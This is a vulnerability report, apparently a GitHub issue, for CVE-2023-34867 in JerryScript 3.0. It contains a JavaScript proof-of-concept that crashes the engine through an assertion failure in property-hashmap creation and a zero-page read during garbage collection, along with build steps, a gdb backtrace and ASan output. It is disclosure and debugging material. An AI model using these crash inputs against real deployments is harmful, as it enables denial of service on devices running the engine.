
CVE-2023-34867: Assertion 'ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)' failed at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c(ecma_property_hashmap_create) · Issue #5084 · jerryscript-project/jerryscr

Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_property_hashmap_create at jerry-core/ecma/base/ecma-property-hashmap.c.


JerryScript revision

Commit: 05dbbd1
Version: v3.0.0

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps

# Build used to reproduce the report: a 32-bit (-m32) debug build (--debug) with
# AddressSanitizer (-fsanitize=address) and frame pointers kept (-fno-omit-frame-pointer).
# -g together with --strip=off keeps symbols, which is why the gdb backtrace and the
# ASan report below resolve to file:line. The /lib32/libc.so.6 frames in the backtrace
# match the -m32 target. --debug is what turns the JERRY_ASSERT into the ICE abort seen
# below; the release-mode run relies on ASan to surface the same fault as a SEGV.
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

Test case

// Reproducer for the assertion failure in ecma_property_hashmap_create (debug build)
// and the null-page read in ecma_gc_mark_properties (release build, ASan report below).
// Token spacing is a rendering artifact of the report; the statements are unchanged.
//
// `r` copies every enumerable property of its second argument onto the function object
// `r` itself and returns `r` (`a || { }` turns a falsy argument into a no-op; `func0` is unused).
// The loop runs 256 times. Each pass pushes a fresh null-prototype object AND the array
// `a` itself onto `a` (so `a` grows by two per pass and contains a reference to itself),
// adds two properties, then replaces `n` with a WeakSet built by iterating `a` and adds
// two more properties on the WeakSet. Both recorded failures happen inside this loop:
// the debug assertion is reached from Array.prototype.push (push frame with length=448
// in the gdb backtrace), the release SEGV from WeakSet construction
// (ecma_builtin_weakset_dispatch_construct -> GC -> ecma_gc_mark_properties).
var r = function ( func0 , a ) { for ( var v in a || { } ) { r [ v ] = a [ v ] ; } return r ; } ; var a = [ ] ; for ( var v = 0 ; v < 256 ; v ++ ) { var n = Object . create ( null ) ; a . push ( n , a ) ; n . v = 1 ; n . o = 1 ; n = new WeakSet ( a ) ; n . t = 1 ; n . o = 1 ; } n . i = 1 ;

// `a` is an array and therefore always truthy; this guard never fires.
// Test262Error is not defined in this file (presumably supplied by the harness that
// generated the case — TODO confirm).
if ( ! a ) throw new Test262Error ( " out " ) ;

// Adds two more properties to the last WeakSet, serializes it with `a` passed as the
// replacer array, then serializes the resulting string once more. From here on `n`
// holds a string, not the WeakSet.
n . O = 1 ; n . m = 1 ; n = JSON . stringify ( JSON . stringify ( n , a ) ) ;

// `r.deref` is never assigned anywhere in this file, so an engine that gets this far
// evaluates `undefined != 1` and takes the throw. The crash reported below occurs in
// the loop on the first line, before this point is reached.
if ( r . deref != 1 ) throw new Test262Error ( " digit " ) ;

// Bulk property assignments on `n` (several keys — A, ax, m, q — are assigned more than
// once). Because `n` is a string after the JSON.stringify above, these target a
// primitive, and `Object . create ( n )` with a non-object prototype would be rejected
// by a conforming engine; this tail is effectively unreachable for the reported bug.
// Otherwise: `o` inherits from `n`, the helper copies `o`'s enumerable properties onto
// `r` (returned as `f`), and the final loop throws only if a copied value differs from
// both lookups.
n . h = 1 ; n . T = 1 ; n . U = 1 ; n . g = 1 ; n . j = 1 ; n . k = 1 ; n . m = 1 ; n . p = 1 ; n . q = 1 ; n . A = 1 ; n . B = 1 ; n . as = 1 ; n . C = 1 ; n . A = 1 ; n . q = 0.1 ; n . D = 1 ; n . F = 1 ; n . G = 1 ; n . ax = 1 ; n . ax = 1 ; n . H = 1 ; n . I = 1 ; n . J = 1 ; n . K = 1 ; n . L = 1 ; n . M = 1 ; n . N = 1 ; var o = Object . create ( n ) ; var f = r ( { } , o ) ; for ( var t in f ) { if ( f [ t ] !== f [ " " ] ) { if ( f [ t ] !== f [ " " + t ] ) { throw new Error ( " OUT " ) ; } } }

// poc.js
var a = [ ] ; for ( var v = 0 ; v < 256 ; v ++ ) { var n = Object . create ( null ) ; a . push ( n , a ) ; n = new WeakSet ( a ) ; n . o = 1 ; }

Execution steps & Output

$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)' failed at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c(ecma_property_hashmap_create):146.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted

Backtrace

(gdb) bt
#0  0xf7fcfd99 in __kernel_vsyscall ()
#1  0xf7ca4276 in raise () from /lib32/libc.so.6
#2  0xf7c8c3f7 in abort () from /lib32/libc.so.6
#3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at ./jerryscript/jerry-port/common/jerry-port-process.c:29
#4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at ./jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5  0x08260d64 in jerry_assert_fail (assertion=0x8418d00 <str> "ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)",
    file=0x8418d60 <str> "./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c", function=0x8418de0 <__func__.ecma_property_hashmap_create> "ecma_property_hashmap_create",
    line=146) at ./jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6  0x081a3e63 in ecma_property_hashmap_create (object_p=0xf5500880) at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c:146
#7  0x081a4342 in ecma_property_hashmap_insert (object_p=0xf5500880, name_p=0x3815, property_pair_p=0xf2d1a140, property_index=0)
    at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c:236
#8  0x08189d0a in ecma_create_property (object_p=<optimized out>, name_p=<optimized out>, type_and_flags=<optimized out>, value=..., out_prop_p=<optimized out>)
    at ./jerryscript/jerry-core/ecma/base/ecma-helpers.c:448
#9  0x0818836a in ecma_create_named_data_property (object_p=0xf5500880, name_p=0x3815, prop_attributes=7 '\a', out_prop_p=0x0)
    at ./jerryscript/jerry-core/ecma/base/ecma-helpers.c:536
#10 0x08217e4e in ecma_op_object_put_apply_receiver (receiver=<optimized out>, property_name_p=<optimized out>, value=<optimized out>, is_throw=<optimized out>)
    at ./jerryscript/jerry-core/ecma/operations/ecma-objects.c:1241
#11 0x08216a71 in ecma_op_object_put_with_receiver (object_p=<optimized out>, property_name_p=<optimized out>, value=<optimized out>, receiver=<optimized out>, is_throw=<optimized out>)
    at ./jerryscript/jerry-core/ecma/operations/ecma-objects.c:1595
#12 0x08214f3a in ecma_op_object_put (object_p=0xf5500880, property_name_p=0x3815, value=<optimized out>, is_throw=<optimized out>)
    at ./jerryscript/jerry-core/ecma/operations/ecma-objects.c:1143
#13 ecma_op_object_put_by_index (object_p=0xf5500880, index=448, value=4117759059, is_throw=<optimized out>) at ./jerryscript/jerry-core/ecma/operations/ecma-objects.c:1109
#14 0x0830d9b1 in ecma_builtin_array_prototype_object_push (argument_list_p=<optimized out>, arguments_number=2, obj_p=0xf5500880, length=448)
    at ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:465
#15 ecma_builtin_array_prototype_dispatch_routine (builtin_routine_id=<optimized out>, this_arg=<optimized out>, arguments_list_p=<optimized out>, arguments_number=<optimized out>)
    at ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2839
#16 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>, this_arg_value=<optimized out>, arguments_list_p=0xffffce30, arguments_list_len=<optimized out>)
    at ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#17 ecma_builtin_dispatch_call (obj_p=<optimized out>, this_arg_value=<optimized out>, arguments_list_p=<optimized out>, arguments_list_len=<optimized out>)
    at ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#18 0x081fb6b8 in ecma_op_function_call_native_built_in (func_obj_p=0xf5500790, this_arg_value=4115662979, arguments_list_p=0xffffd054, arguments_list_len=2)
    at ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#19 0x081fa81d in ecma_op_function_call (func_obj_p=0xf5500790, this_arg_value=4115662979, arguments_list_p=0xffffd054, arguments_list_len=2)
    at ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#20 0x081fa5cf in ecma_op_function_validated_call (callee=4115662739, this_arg_value=4115662979, arguments_list_p=0xffffd054, arguments_list_len=2)
    at ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
#21 0x082d7631 in opfunc_call (frame_ctx_p=<optimized out>) at ./jerryscript/jerry-core/vm/vm.c:758
#22 vm_execute (frame_ctx_p=0xffffd020) at ./jerryscript/jerry-core/vm/vm.c:5217
#23 0x082d4f62 in vm_run (shared_p=0xffffd110, this_binding_value=4119870595, lex_env_p=0xf57007b0) at ./jerryscript/jerry-core/vm/vm.c:5312
#24 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>, function_object_p=<optimized out>) at ./jerryscript/jerry-core/vm/vm.c:286
#25 0x0812a4e5 in jerry_run (script=4115663075) at ./jerryscript/jerry-core/api/jerryscript.c:548
#26 0x083eac3f in jerryx_source_exec_script (path_p=0xffffd5df "poc.js") at ./jerryscript/jerry-ext/util/sources.c:68
#27 0x0812162d in main (argc=<optimized out>, argv=<optimized out>) at ./jerryscript/jerry-main/main-desktop.c:156
(gdb)

With a release-mode build

Outputs

AddressSanitizer:DEADLYSIGNAL
=================================================================
==1512811==ERROR: AddressSanitizer: SEGV on unknown address 0x0000023e (pc 0x5659bb0f bp 0xff8ef1d8 sp 0xff8ef190 T0)
==1512811==The signal is caused by a READ memory access.
==1512811==Hint: address points to the zero page.
    #0 0x5659bb0e in ecma_gc_mark_properties ./jerryscript/jerry-core/ecma/base/ecma-gc.c:287
    #1 0x5659e95d in ecma_gc_run ./jerryscript/jerry-core/ecma/base/ecma-gc.c:2158
    #2 0x565f3d83 in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:285
    #3 0x566365ad in ecma_alloc_property_pair ./jerryscript/jerry-core/ecma/base/ecma-alloc.c:253
    #4 0x565ac30d in ecma_create_property ./jerryscript/jerry-core/ecma/base/ecma-helpers.c:457
    #5 0x565d424d in ecma_create_iter_result_object ./jerryscript/jerry-core/ecma/operations/ecma-iterator-object.c:98
    #6 0x56636d82 in ecma_builtin_array_iterator_prototype_object_next ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-iterator-prototype.c:172
    #7 0x56636d82 in ecma_builtin_array_iterator_prototype_dispatch_routine ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-iterator-prototype.c:211
    #8 0x565bba28 in ecma_builtin_dispatch_routine ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
    #9 0x565bba28 in ecma_builtin_dispatch_call ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
    #10 0x565d0db7 in ecma_op_function_call_native_built_in ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
    #11 0x565d2c84 in ecma_op_function_call ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
    #12 0x565d449d in ecma_op_iterator_next ./jerryscript/jerry-core/ecma/operations/ecma-iterator-object.c:317
    #13 0x565d46d3 in ecma_op_iterator_step ./jerryscript/jerry-core/ecma/operations/ecma-iterator-object.c:559
    #14 0x565ca92e in ecma_op_container_create ./jerryscript/jerry-core/ecma/operations/ecma-container-object.c:435
    #15 0x56657dbd in ecma_builtin_weakset_dispatch_construct ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-weakset.c:62
    #16 0x565d3086 in ecma_op_function_construct_built_in ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1537
    #17 0x565d3086 in ecma_op_function_construct ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1717
    #18 0x56634c33 in opfunc_construct ./jerryscript/jerry-core/vm/vm.c:840
    #19 0x56634c33 in vm_execute ./jerryscript/jerry-core/vm/vm.c:5236
    #20 0x56635152 in vm_run ./jerryscript/jerry-core/vm/vm.c:5312
    #21 0x5663538f in vm_run_global ./jerryscript/jerry-core/vm/vm.c:286
    #22 0x5659382e in jerry_run ./jerryscript/jerry-core/api/jerryscript.c:548
    #23 0x5668871b in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:68
    #24 0x5658bd04 in main ./jerryscript/jerry-main/main-desktop.c:156
    #25 0xf76ceed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
    #26 0x5658efb4 in _start (/./jerryscript/build/bin/jerry+0x12fb4)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ./jerryscript/jerry-core/ecma/base/ecma-gc.c:287 in ecma_gc_mark_properties
==1512811==ABORTING

Credits: @Ye0nny, @EJueon of the seclab-yonsei.
